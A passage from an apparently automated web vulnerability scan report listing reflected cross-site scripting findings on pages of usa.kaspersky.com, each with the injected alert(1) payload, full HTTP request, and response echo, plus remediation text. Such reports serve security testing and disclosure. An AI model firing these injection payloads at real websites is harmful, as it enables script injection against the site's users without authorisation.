Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:17:48 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685468"
Content-Type: text/html; charset=utf-8
Content-Length: 30313
Date: Sat, 18 Dec 2010 15:17:53 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads53f67"><script>alert(1)</script>e5525a7df97/free-home-trials/internet-security" />
...[SNIP]...

1.51. http://usa.kaspersky.com/downloads/free-home-trials/internet-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-home-trials/internet-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c049c"-alert(1)-"2185db87f1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloadsc049c"-alert(1)-"2185db87f1a/free-home-trials/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:18:07 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685487"
Content-Type: text/html; charset=utf-8
Content-Length: 34967
Date: Sat, 18 Dec 2010 15:18:18 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloadsc049c"-alert(1)-"2185db87f1a/free-home-trials/internet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.52. http://usa.kaspersky.com/downloads/free-home-trials/internet-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-home-trials/internet-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3154b"><script>alert(1)</script>f280fc95661 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-home-trials3154b"><script>alert(1)</script>f280fc95661/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:19:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685585"
Content-Type: text/html; charset=utf-8
Content-Length: 30439
Date: Sat, 18 Dec 2010 15:19:53 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-home-trials3154b"><script>alert(1)</script>f280fc95661/internet-security" />
...[SNIP]...

1.53. http://usa.kaspersky.com/downloads/free-home-trials/internet-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-home-trials/internet-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87ef1"-alert(1)-"f444d46efd5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-home-trials87ef1"-alert(1)-"f444d46efd5/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:20:04 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685604"
Content-Type: text/html; charset=utf-8
Content-Length: 38830
Date: Sat, 18 Dec 2010 15:20:12 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-home-trials87ef1"-alert(1)-"f444d46efd5/internet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.54. http://usa.kaspersky.com/downloads/free-home-trials/internet-security [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-home-trials/internet-security

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4270d"><script>alert(1)</script>021737ed3cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-home-trials/internet-security4270d"><script>alert(1)</script>021737ed3cc HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:22:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685749"
Content-Type: text/html; charset=utf-8
Content-Length: 30502
Date: Sat, 18 Dec 2010 15:22:33 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-home-trials/internet-security4270d"><script>alert(1)</script>021737ed3cc" />
...[SNIP]...

1.55. http://usa.kaspersky.com/downloads/free-home-trials/internet-security [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-home-trials/internet-security

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3716"-alert(1)-"efb8c643c8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-home-trials/internet-securitya3716"-alert(1)-"efb8c643c8f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:22:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685766"
Content-Type: text/html; charset=utf-8
Content-Length: 35166
Date: Sat, 18 Dec 2010 15:22:54 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
geName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-home-trials/internet-securitya3716"-alert(1)-"efb8c643c8f";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.56. http://usa.kaspersky.com/downloads/free-home-trials/internet-security [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-home-trials/internet-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b78e5"><script>alert(1)</script>e85bc82b27b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-home-trials/internet-security?b78e5"><script>alert(1)</script>e85bc82b27b=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:15:19 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685319"
Content-Type: text/html; charset=utf-8
Content-Length: 35619
Date: Sat, 18 Dec 2010 15:15:28 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-home-trials/internet-security?b78e5"><script>alert(1)</script>e85bc82b27b=1" />
...[SNIP]...

1.57. http://usa.kaspersky.com/downloads/free-trial-form [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trial-form

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0948"><script>alert(1)</script>f5464690436 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsb0948"><script>alert(1)</script>f5464690436/free-trial-form HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:11:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685119"
Content-Type: text/html; charset=utf-8
Content-Length: 30199
Date: Sat, 18 Dec 2010 15:12:05 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloadsb0948"><script>alert(1)</script>f5464690436/free-trial-form" />
...[SNIP]...

1.58. http://usa.kaspersky.com/downloads/free-trial-form [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trial-form

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e70e3"-alert(1)-"ca696b0ec2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloadse70e3"-alert(1)-"ca696b0ec2a/free-trial-form HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:12:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685137"
Content-Type: text/html; charset=utf-8
Content-Length: 30102
Date: Sat, 18 Dec 2010 15:12:23 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloadse70e3"-alert(1)-"ca696b0ec2a/free-trial-form";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.59. http://usa.kaspersky.com/downloads/free-trial-form [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trial-form

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2749</script><script>alert(1)</script>2f287bf920a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-trial-forma2749</script><script>alert(1)</script>2f287bf920a HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:14:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685297"
Content-Type: text/html; charset=utf-8
Content-Length: 30365
Date: Sat, 18 Dec 2010 15:15:01 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-trial-forma2749</script><script>alert(1)</script>2f287bf920a";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.60. http://usa.kaspersky.com/downloads/free-trial-form [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trial-form

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc697"><script>alert(1)</script>b8bb4dfedc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-trial-formdc697"><script>alert(1)</script>b8bb4dfedc0 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:14:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685245"
Content-Type: text/html; charset=utf-8
Content-Length: 30325
Date: Sat, 18 Dec 2010 15:14:13 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-trial-formdc697"><script>alert(1)</script>b8bb4dfedc0" />
...[SNIP]...

1.61. http://usa.kaspersky.com/downloads/free-trial-form [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trial-form

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b2a"><script>alert(1)</script>dacfd278d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-trial-form?d3b2a"><script>alert(1)</script>dacfd278d9=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:10:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685001"
Content-Type: text/html; charset=utf-8
Content-Length: 32485
Date: Sat, 18 Dec 2010 15:10:10 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-trial-form?d3b2a"><script>alert(1)</script>dacfd278d9=1" />
...[SNIP]...

1.62. http://usa.kaspersky.com/downloads/free-trials/free-business-trials [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-business-trials

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7655f"><script>alert(1)</script>a64818b075b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads7655f"><script>alert(1)</script>a64818b075b/free-trials/free-business-trials HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:32:26 +0000
